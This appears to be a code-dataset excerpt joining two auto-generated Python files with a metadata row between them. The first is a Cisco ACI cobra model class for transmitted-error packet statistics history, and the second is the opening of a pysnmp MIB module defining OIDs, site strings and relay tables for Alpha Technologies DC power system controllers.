meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.comp.Hv")
meta.parentClasses.add("cobra.model.comp.HpNic")
meta.parentClasses.add("cobra.model.comp.VNic")
meta.parentClasses.add("cobra.model.comp.Vm")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Hist")
meta.superClasses.add("cobra.model.comp.TrnsmtdErrPktsHist")
meta.rnPrefixes = [
('HDcompTrnsmtdErrPkts1d-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "dropAvg", "dropAvg", 7749, PropCategory.IMPLICIT_AVG)
prop.label = "transmitted dropped packets average value"
prop.isOper = True
prop.isStats = True
meta.props.add("dropAvg", prop)
prop = PropMeta("str", "dropCum", "dropCum", 7745, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "transmitted dropped packets cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("dropCum", prop)
prop = PropMeta("str", "dropMax", "dropMax", 7748, PropCategory.IMPLICIT_MAX)
prop.label = "transmitted dropped packets maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("dropMax", prop)
prop = PropMeta("str", "dropMin", "dropMin", 7747, PropCategory.IMPLICIT_MIN)
prop.label = "transmitted dropped packets minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("dropMin", prop)
prop = PropMeta("str", "dropPer", "dropPer", 7746, PropCategory.IMPLICIT_PERIODIC)
prop.label = "transmitted dropped packets periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("dropPer", prop)
prop = PropMeta("str", "dropRate", "dropRate", 7753, PropCategory.IMPLICIT_RATE)
prop.label = "transmitted dropped packets rate"
prop.isOper = True
prop.isStats = True
meta.props.add("dropRate", prop)
prop = PropMeta("str", "dropSpct", "dropSpct", 7750, PropCategory.IMPLICIT_SUSPECT)
prop.label = "transmitted dropped packets suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("dropSpct", prop)
prop = PropMeta("str", "dropThr", "dropThr", 7751, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "transmitted dropped packets thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("dropThr", prop)
prop = PropMeta("str", "dropTr", "dropTr", 7752, PropCategory.IMPLICIT_TREND)
prop.label = "transmitted dropped packets trend"
prop.isOper = True
prop.isStats = True
meta.props.add("dropTr", prop)
prop = PropMeta("str", "errorAvg", "errorAvg", 7770, PropCategory.IMPLICIT_AVG)
prop.label = "transmitted error packets average value"
prop.isOper = True
prop.isStats = True
meta.props.add("errorAvg", prop)
prop = PropMeta("str", "errorCum", "errorCum", 7766, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "transmitted error packets cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("errorCum", prop)
prop = PropMeta("str", "errorMax", "errorMax", 7769, PropCategory.IMPLICIT_MAX)
prop.label = "transmitted error packets maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("errorMax", prop)
prop = PropMeta("str", "errorMin", "errorMin", 7768, PropCategory.IMPLICIT_MIN)
prop.label = "transmitted error packets minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("errorMin", prop)
prop = PropMeta("str", "errorPer", "errorPer", 7767, PropCategory.IMPLICIT_PERIODIC)
prop.label = "transmitted error packets periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("errorPer", prop)
prop = PropMeta("str", "errorRate", "errorRate", 7774, PropCategory.IMPLICIT_RATE)
prop.label = "transmitted error packets rate"
prop.isOper = True
prop.isStats = True
meta.props.add("errorRate", prop)
prop = PropMeta("str", "errorSpct", "errorSpct", 7771, PropCategory.IMPLICIT_SUSPECT)
prop.label = "transmitted error packets suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("errorSpct", prop)
prop = PropMeta("str", "errorThr", "errorThr", 7772, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "transmitted error packets thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("errorThr", prop)
prop = PropMeta("str", "errorTr", "errorTr", 7773, PropCategory.IMPLICIT_TREND)
prop.label = "transmitted error packets trend"
prop.isOper = True
prop.isStats = True
meta.props.add("errorTr", prop)
prop = PropMeta("str", "index", "index", 5957, PropCategory.REGULAR)
prop.label = "History Index"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
meta.props.add("index", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
meta.namingProps.append(getattr(meta.props, "index"))
def __init__(self, parentMoOrDn, index, markDirty=True, **creationProps):
    """Construct this managed object under *parentMoOrDn*.

    `index` is the single naming property of this MO (the class meta above
    appends "index" to meta.namingProps); it is forwarded to the base `Mo`
    constructor as the naming value.
    """
    # NOTE(review): SOURCE indentation was flattened; body re-indented
    # conventionally — confirm against the generated original.
    namingVals = [index]
    Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"bkhoward@live.com"
] | bkhoward@live.com |
5a8b3968a4cc55cdc7a8bc045270be33a8d29f1b | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/AlphaPowerSystem-MIB.py | c83f2dc059508d3a6ad59c5621b516f5335d4221 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 87,886 | py | #
# PySNMP MIB module AlphaPowerSystem-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/AlphaPowerSystem-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:33:13 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Bits, MibIdentifier, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32, ObjectIdentity, Unsigned32, enterprises, ModuleIdentity, Counter32, Counter64, IpAddress, TimeTicks, Integer32, iso = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "MibIdentifier", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32", "ObjectIdentity", "Unsigned32", "enterprises", "ModuleIdentity", "Counter32", "Counter64", "IpAddress", "TimeTicks", "Integer32", "iso")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
# Module identity: the Alpha Technologies enterprise subtree
# (1.3.6.1.4.1.7309).  The loadTexts guards attach human-readable MIB
# metadata only when the mibBuilder was configured to load texts.
alpha = ModuleIdentity((1, 3, 6, 1, 4, 1, 7309))
if mibBuilder.loadTexts: alpha.setLastUpdated('201102220000Z')
if mibBuilder.loadTexts: alpha.setOrganization('Alpha Technologies')
if mibBuilder.loadTexts: alpha.setContactInfo('Alpha Technologies 7700 Riverfront Gate Burnaby, BC V5J 5M4 Canada Tel: 1-604-436-5900 Fax: 1-604-436-1233')
if mibBuilder.loadTexts: alpha.setDescription('This MIB defines the information block(s) available in system controllers as defined by the following list: - dcPwrSysDevice: Cordex series of Controllers')
# ---- OID subtree layout under enterprises.alpha(7309).dcpower(4) ----
# Branch 4.1.x:  1=variables, 2=strings, 3=traps, 4=outputs, 5=alarms,
# 6=inputs, 8=external controls, 9=varbind name reference.
dcpower = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4))
dcPwrSysDevice = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1))
dcPwrSysVariable = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1))
dcPwrSysString = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2))
dcPwrSysTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 3))
# Output tables (4.1.4): relay and analog outputs.
dcPwrSysOutputsTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4))
dcPwrSysRelayTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1))
dcPwrSysAnalogOpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2))
# Alarm tables (4.1.5): one subtree per alarm category.
dcPwrSysAlrmsTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5))
dcPwrSysRectAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1))
dcPwrSysDigAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2))
dcPwrSysCurrAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3))
dcPwrSysVoltAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4))
dcPwrSysBattAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5))
dcPwrSysTempAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6))
dcPwrSysCustomAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7))
dcPwrSysMiscAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8))
dcPwrSysCtrlAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9))
dcPwrSysAdioAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10))
dcPwrSysConvAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11))
dcPwrSysInvAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12))
# Input tables (4.1.6): one subtree per input category.
dcPwrSysInputsTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6))
dcPwrSysDigIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1))
dcPwrSysCntrlrIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2))
dcPwrSysRectIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3))
dcPwrSysCustomIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4))
dcPwrSysConvIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5))
dcPwrSysTimerIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6))
dcPwrSysCounterIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7))
dcPwrExternalControls = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 8))
dcPwrVarbindNameReference = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 9))
# ---- Numeric system scalars (subtree 4.1.1) ----
# Voltage/current readings are fixed-point: integer value = real value * 100
# (per the setDescription texts below).  All scalars are read-only.
dcPwrSysChargeVolts = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysChargeVolts.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysChargeVolts.setDescription('This value indicates the present battery voltage. The integer value represent a two digit fix decimal (Value = real voltage * 100) in Volts.')
dcPwrSysDischargeVolts = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDischargeVolts.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDischargeVolts.setDescription('This value indicates the present load voltage. The integer value represent a two digit fix decimal (Value = real voltage * 100) in Volts.')
dcPwrSysChargeAmps = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysChargeAmps.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysChargeAmps.setDescription('This value indicates the present battery currrent. The integer value represent a two digit fix decimal (Value = real current * 100) in Amps.')
dcPwrSysDischargeAmps = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDischargeAmps.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDischargeAmps.setDescription('This value indicates the present load current. The integer value represent a two digit fix decimal (Value = real current * 100) in Amps.')
# Aggregate alarm flags (0..65535).
dcPwrSysMajorAlarm = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMajorAlarm.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMajorAlarm.setDescription('Major Alarm')
dcPwrSysMinorAlarm = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMinorAlarm.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMinorAlarm.setDescription('Minor Alarm')
# ---- Site / system identification strings (subtree 4.1.2) ----
# Read-only DisplayString scalars (0..255 chars) describing the monitored
# site, contact, and controller software.
dcPwrSysSiteName = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSiteName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSiteName.setDescription('Site Name')
dcPwrSysSiteCity = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSiteCity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSiteCity.setDescription('Site City')
dcPwrSysSiteRegion = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSiteRegion.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSiteRegion.setDescription('Site Region')
dcPwrSysSiteCountry = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSiteCountry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSiteCountry.setDescription('Site Country')
dcPwrSysContactName = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysContactName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysContactName.setDescription('Contact Name')
dcPwrSysPhoneNumber = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysPhoneNumber.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysPhoneNumber.setDescription('Phone Number')
dcPwrSysSiteNumber = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 7), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSiteNumber.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSiteNumber.setDescription('Site Number')
dcPwrSysSystemType = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 8), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSystemType.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSystemType.setDescription('The type of system being monitored by the agent.')
dcPwrSysSystemSerial = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 9), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSystemSerial.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSystemSerial.setDescription('The serial number of the monitored system.')
dcPwrSysSystemNumber = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 10), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSystemNumber.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSystemNumber.setDescription('The number of the monitored system.')
dcPwrSysSoftwareVersion = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 11), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSoftwareVersion.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSoftwareVersion.setDescription('The version of software running on the monitored system.')
dcPwrSysSoftwareTimestamp = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 12), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSoftwareTimestamp.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSoftwareTimestamp.setDescription('The time stamp of the software running on the monitored system.')
# ---- Relay output table (4.1.4.1) ----
# Standard table pattern used throughout this MIB: a scalar row count,
# a MibTable, a MibTableRow indexed by the Index column, then read-only
# columns: index, name, integer value, string value, severity.
dcPwrSysRelayCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRelayCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayCount.setDescription('Number of relay variables in system controller relay table.')
dcPwrSysRelayTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2), )
if mibBuilder.loadTexts: dcPwrSysRelayTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayTable.setDescription('A table of DC power system controller rectifier relay output variables.')
dcPwrSysRelayEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysRelayIndex"))
if mibBuilder.loadTexts: dcPwrSysRelayEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayEntry.setDescription('An entry into the DC power system controller relay output group.')
